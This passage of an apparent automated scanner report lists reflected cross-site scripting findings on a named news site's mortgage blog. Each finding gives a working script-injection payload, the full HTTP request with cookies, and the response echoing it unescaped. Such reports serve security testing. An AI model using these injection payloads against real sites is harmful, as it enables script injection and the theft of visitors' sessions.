Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 106435

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2009 April - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/04/?3d59d\"><script>alert(1)</script>7366da0a954=1feed/" />
...[SNIP]...

1.294. http://mortgage.ocregister.com/2009/05/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2009/05/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36880"><script>alert(1)</script>180f3a1c883 was submitted in the REST URL parameter 1. This input was echoed as 36880\"><script>alert(1)</script>180f3a1c883 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /200936880"><script>alert(1)</script>180f3a1c883/05/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:13:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:13:49 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/200936880\"><script>alert(1)</script>180f3a1c883/05/feed/" />
...[SNIP]...

1.295. http://mortgage.ocregister.com/2009/05/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2009/05/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9e2f"><script>alert(1)</script>c8e7e3442e9 was submitted in the REST URL parameter 2. This input was echoed as f9e2f\"><script>alert(1)</script>c8e7e3442e9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2009/05f9e2f"><script>alert(1)</script>c8e7e3442e9/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:13:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:13:52 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62643

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/05f9e2f\"><script>alert(1)</script>c8e7e3442e9/feed/" />
...[SNIP]...

1.296. http://mortgage.ocregister.com/2009/05/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2009/05/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91d00"><script>alert(1)</script>437786ed55 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 91d00\"><script>alert(1)</script>437786ed55 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2009/05/?91d00"><script>alert(1)</script>437786ed55=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 112123

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2009 May - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/05/?91d00\"><script>alert(1)</script>437786ed55=1feed/" />
...[SNIP]...

1.297. http://mortgage.ocregister.com/2009/06/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2009/06/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9c15"><script>alert(1)</script>ad967443caf was submitted in the REST URL parameter 1. This input was echoed as c9c15\"><script>alert(1)</script>ad967443caf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2009c9c15"><script>alert(1)</script>ad967443caf/06/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:13:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:13:23 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62653

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009c9c15\"><script>alert(1)</script>ad967443caf/06/feed/" />
...[SNIP]...

1.298. http://mortgage.ocregister.com/2009/06/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2009/06/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a462c"><script>alert(1)</script>df7a2d0b05a was submitted in the REST URL parameter 2. This input was echoed as a462c\"><script>alert(1)</script>df7a2d0b05a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2009/06a462c"><script>alert(1)</script>df7a2d0b05a/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:13:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:13:35 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/06a462c\"><script>alert(1)</script>df7a2d0b05a/feed/" />
...[SNIP]...

1.299. http://mortgage.ocregister.com/2009/06/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2009/06/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80c8f"><script>alert(1)</script>e0e37e5be57 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 80c8f\"><script>alert(1)</script>e0e37e5be57 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2009/06/?80c8f"><script>alert(1)</script>e0e37e5be57=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 114372

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2009 June - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/06/?80c8f\"><script>alert(1)</script>e0e37e5be57=1feed/" />
...[SNIP]...

1.300. http://mortgage.ocregister.com/2009/07/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2009/07/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7881c"><script>alert(1)</script>3c2f217435e was submitted in the REST URL parameter 1. This input was echoed as 7881c\"><script>alert(1)</script>3c2f217435e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /20097881c"><script>alert(1)</script>3c2f217435e/07/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:13:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:13:19 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62653

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/20097881c\"><script>alert(1)</script>3c2f217435e/07/feed/" />
...[SNIP]...

1.301. http://mortgage.ocregister.com/2009/07/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2009/07/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4782"><script>alert(1)</script>6666c9a16c7 was submitted in the REST URL parameter 2. This input was echoed as b4782\"><script>alert(1)</script>6666c9a16c7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2009/07b4782"><script>alert(1)</script>6666c9a16c7/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:13:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:13:33 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62652

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/07b4782\"><script>alert(1)</script>6666c9a16c7/feed/" />
...[SNIP]...

1.302. http://mortgage.ocregister.com/2009/07/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2009/07/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a46b7"><script>alert(1)</script>653aab2ba5c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a46b7\"><script>alert(1)</script>653aab2ba5c in the application's response.

The reflected href (...?a46b7\"><script>alert(1)</script>653aab2ba5c=1feed/) also reveals how the link is built: feed/ is appended to the raw request URI, query string included, so any parameter name reaches the attribute unchanged. The only transformation applied is a backslash before the quote, which a browser does not treat as an escape inside an HTML attribute, so the href value is still closed and the injected <script> element is parsed.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2009/07/?a46b7"><script>alert(1)</script>653aab2ba5c=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 113888

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2009 July - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/07/?a46b7\"><script>alert(1)</script>653aab2ba5c=1feed/" />
...[SNIP]...

1.303. http://mortgage.ocregister.com/2009/08/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2009/08/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e95c"><script>alert(1)</script>65109d80feb was submitted in the REST URL parameter 1. This input was echoed as 2e95c\"><script>alert(1)</script>65109d80feb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /20092e95c"><script>alert(1)</script>65109d80feb/08/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:13:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:13:32 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/20092e95c\"><script>alert(1)</script>65109d80feb/08/feed/" />
...[SNIP]...

1.304. http://mortgage.ocregister.com/2009/08/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2009/08/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41f3f"><script>alert(1)</script>c6967a59290 was submitted in the REST URL parameter 2. This input was echoed as 41f3f\"><script>alert(1)</script>c6967a59290 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2009/0841f3f"><script>alert(1)</script>c6967a59290/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:13:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:13:38 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/0841f3f\"><script>alert(1)</script>c6967a59290/feed/" />
...[SNIP]...

1.305. http://mortgage.ocregister.com/2009/08/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2009/08/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91a1e"><script>alert(1)</script>468ca413bb4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 91a1e\"><script>alert(1)</script>468ca413bb4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2009/08/?91a1e"><script>alert(1)</script>468ca413bb4=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 109320

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2009 August - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/08/?91a1e\"><script>alert(1)</script>468ca413bb4=1feed/" />
...[SNIP]...

1.306. http://mortgage.ocregister.com/2009/09/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2009/09/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e4e9"><script>alert(1)</script>62c20fd5f6c was submitted in the REST URL parameter 1. This input was echoed as 3e4e9\"><script>alert(1)</script>62c20fd5f6c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /20093e4e9"><script>alert(1)</script>62c20fd5f6c/09/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:13:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:13:17 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/20093e4e9\"><script>alert(1)</script>62c20fd5f6c/09/feed/" />
...[SNIP]...

1.307. http://mortgage.ocregister.com/2009/09/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2009/09/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43615"><script>alert(1)</script>66b5d481b5d was submitted in the REST URL parameter 2. This input was echoed as 43615\"><script>alert(1)</script>66b5d481b5d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2009/0943615"><script>alert(1)</script>66b5d481b5d/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
